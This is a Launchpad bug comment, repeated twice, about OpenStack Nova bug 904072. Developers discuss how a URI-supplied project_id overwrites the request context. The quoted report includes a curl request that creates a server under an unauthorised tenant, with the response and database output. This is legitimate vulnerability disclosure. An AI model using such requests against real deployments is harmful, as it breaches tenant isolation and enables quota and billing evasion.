OpenStack Compute (nova)

Bug #904072
Comment #10

Comment 10 for bug 904072

Revision history for this message

Vish Ishaya (vishvananda) wrote on 2011-12-16: Re: [Bug 904072] Re: project_id could be overwritten to any value by URI value

#10

Comments below

On Dec 16, 2011, at 1:30 PM, anotherjesse wrote:

> ttx
>
> 1) you still need to be authenticated. The keystone middleware doesn't
> let the request hit the router if you fail to auth.
>
> 2) you can issue any openstack api request against any tenant.
>
> Because most logic in the API uses the context (not the URL) to specify
> the resources you are interacting with (for example list servers uses
> the tenant from the context)
>
> instance_list = self.compute_api.get_all(context,
> search_opts=search_opts)
>
> https://github.com/openstack/nova/blob/master/nova/api/openstack/v2/servers.py#L145
>
> So you can create a server in another project but delete, list, show
> (and most other api calls) will not be able to modify it by via the api.
> This is because the way that the database layer is written is defensive
> - it only lets you access data that your context says you have access
> to.
>
> This is still bad in that it allows creation of resources outside of
> your project (for quota/billing avoidance) and there could be more
> tunnels.

I believe this is incorrect. The broken code actually sets context.project_id = to whatever was in the url, so I think you can list and terminate instances in other projects as well.
>
> 3) only affects if you are the openstack api using keystone (not
> deprecated auth)
>
> It shouldn't affect people who use the default (which is nova's internal
> legacy auth) or who use the ec2 api

legacy auth is also broken afaik, because it will successfully authenticate and then the authentication will be overwritten by the url. EC2 auth shouldn't be affected.
>
> --
> You received this bug notification because you are a member of Nova
> Core, which is subscribed to the bug report.
> https://bugs.launchpad.net/bugs/904072
>
> Title:
> project_id could be overwritten to any value by URI value
>
> Status in OpenStack Compute (Nova):
> Confirmed
>
> Bug description:
> project_id could be overwritten to any value by URI value.
> User can create server on any project (even if it is not exist)
> Quota function will not be working because of this bug. (So This bug is a security vulnerability)
>
> --Test condition
> user : demo (not admin)
> project_id: 2
>
> -- Requeest
> stack@freecloud116:~/devstack$ curl -H "Content-type: application/json" -H "x-auth-token: 8bbdb554-a671-446e-a6c2-07326eeb9ad5" -d '{"server": {"min_count": 1, "flavorRef": "1", "name": "test5", "imageRef": "2", "max_count": 1}}' http://localhost:8774/v1.1/tushar2/servers <-- invalid tenant_id
>
> -- Response
> {"server": {"status": "BUILD", "updated": "2011-12-14T03:06:04Z", "hostId": "", "user_id": "demo", "name": "test5", "links": [{"href": "http://localhost:8774/v1.1/tushar2/servers/7", "rel": "self"}, {"href": "http://localhost:8774/tushar2/servers/7", "rel": "bookmark"}], "addresses": {}, "tenant_id": "tushar2", "image": {"id": "2", "links": [{"href": "http://localhost:8774/tushar2/images/2", "rel": "bookmark"}]}, "created": "2011-12-14T03:06:04Z", "uuid": "5b63c965-8966-4ebc-ae1b-1c1c551a044c", "accessIPv4": "", "accessIPv6": "", "key_name": null, "adminPass": "id8SngCb7xeRq67K", "progress": 0, "flavor": {"id": "1", "links": [{"href": "http://localhost:8774/tushar2/flavors/1", "rel": "bookmark"}]}, "config_drive": "", "id": 7, "metadata": {}}}stack@freecloud116:~/devstack$
>
> -- DB result
> instance with project_id "tushar2" is created
>
> mysql> select id,project_id from instances;
> +----+------------+
> | id | project_id |
> +----+------------+
> | 1 | demo5 |
> | 2 | demo5 |
> | 3 | tushar |
> | 4 | tushar1 |
> | 5 | tushar2 |
> | 6 | tushar2 |
> | 7 | tushar2 |
> +----+------------+
> 7 rows in set (0.00 sec)
>
> --Cause of this bug
> This code set project_id to request object from uri
> https://github.com/openstack/nova/blob/master/nova/api/openstack/v2/__init__.py#L78
>
> Then this code set the project_id to context object
> https://github.com/openstack/nova/blob/master/nova/api/openstack/wsgi.py#L554
>
> To manage notifications about this bug go to:
> https://bugs.launchpad.net/nova/+bug/904072/+subscriptions

Comments below

On Dec 16, 2011, at 1:30 PM, anotherjesse wrote:

> ttx
> 
> 1) you still need to be authenticated.  The keystone middleware doesn't
> let the request hit the router if you fail to auth.
> 
> 2) you can issue any openstack api request against any tenant.
> 
> Because most logic in the API uses the context (not the URL) to specify
> the resources you are interacting with (for example list servers uses
> the tenant from the context)
> 
>        instance_list = self.compute_api.get_all(context,
>                                                 search_opts=search_opts)
> 
> https://github.com/openstack/nova/blob/master/nova/api/openstack/v2/servers.py#L145
> 
> So you can create a server in another project but delete, list, show
> (and most other api calls) will not be able to modify it by via the api.
> This is because the way that the database layer is written is defensive
> - it only lets you access data that your context says you have access
> to.
> 
> This is still bad in that it allows creation of resources outside of
> your project (for quota/billing avoidance) and there could be more
> tunnels.

I believe this is incorrect.  The broken code actually sets context.project_id = to whatever was in the url, so I think you can list and terminate instances in other projects as well.
> 
> 3) only affects if you are the openstack api using keystone (not
> deprecated auth)
> 
> It shouldn't affect people who use the default (which is nova's internal
> legacy auth) or who use the ec2 api

legacy auth is also broken afaik, because it will successfully authenticate and then the authentication will be overwritten by the url.  EC2 auth shouldn't be affected.
> 
> -- 
> You received this bug notification because you are a member of Nova
> Core, which is subscribed to the bug report.
> https://bugs.launchpad.net/bugs/904072
> 
> Title:
>  project_id could be overwritten to any value by URI value
> 
> Status in OpenStack Compute (Nova):
>  Confirmed
> 
> Bug description:
>  project_id could be overwritten to any value by URI value.
>  User can create server on any project (even if it is not exist) 
>  Quota function will not be working because of this bug. (So This bug is a security vulnerability)
> 
>  --Test condition
>  user : demo (not admin)
>  project_id: 2 
> 
>  -- Requeest
>  stack@freecloud116:~/devstack$ curl -H "Content-type: application/json" -H "x-auth-token: 8bbdb554-a671-446e-a6c2-07326eeb9ad5" -d '{"server": {"min_count": 1, "flavorRef": "1", "name": "test5", "imageRef": "2", "max_count": 1}}' http://localhost:8774/v1.1/tushar2/servers  <-- invalid tenant_id
> 
>  -- Response
>  {"server": {"status": "BUILD", "updated": "2011-12-14T03:06:04Z", "hostId": "", "user_id": "demo", "name": "test5", "links": [{"href": "http://localhost:8774/v1.1/tushar2/servers/7", "rel": "self"}, {"href": "http://localhost:8774/tushar2/servers/7", "rel": "bookmark"}], "addresses": {}, "tenant_id": "tushar2", "image": {"id": "2", "links": [{"href": "http://localhost:8774/tushar2/images/2", "rel": "bookmark"}]}, "created": "2011-12-14T03:06:04Z", "uuid": "5b63c965-8966-4ebc-ae1b-1c1c551a044c", "accessIPv4": "", "accessIPv6": "", "key_name": null, "adminPass": "id8SngCb7xeRq67K", "progress": 0, "flavor": {"id": "1", "links": [{"href": "http://localhost:8774/tushar2/flavors/1", "rel": "bookmark"}]}, "config_drive": "", "id": 7, "metadata": {}}}stack@freecloud116:~/devstack$ 
> 
>  -- DB result
>  instance with project_id "tushar2" is created
> 
>  mysql> select id,project_id from instances;
>  +----+------------+
>  | id | project_id |
>  +----+------------+
>  |  1 | demo5      |
>  |  2 | demo5      |
>  |  3 | tushar     |
>  |  4 | tushar1    |
>  |  5 | tushar2    |
>  |  6 | tushar2    |
>  |  7 | tushar2    |
>  +----+------------+
>  7 rows in set (0.00 sec)
> 
>  --Cause of this bug
>  This code set project_id to request object from uri
>  https://github.com/openstack/nova/blob/master/nova/api/openstack/v2/__init__.py#L78
> 
>  Then this code set the project_id to context object
>  https://github.com/openstack/nova/blob/master/nova/api/openstack/wsgi.py#L554
> 
> To manage notifications about this bug go to:
> https://bugs.launchpad.net/nova/+bug/904072/+subscriptions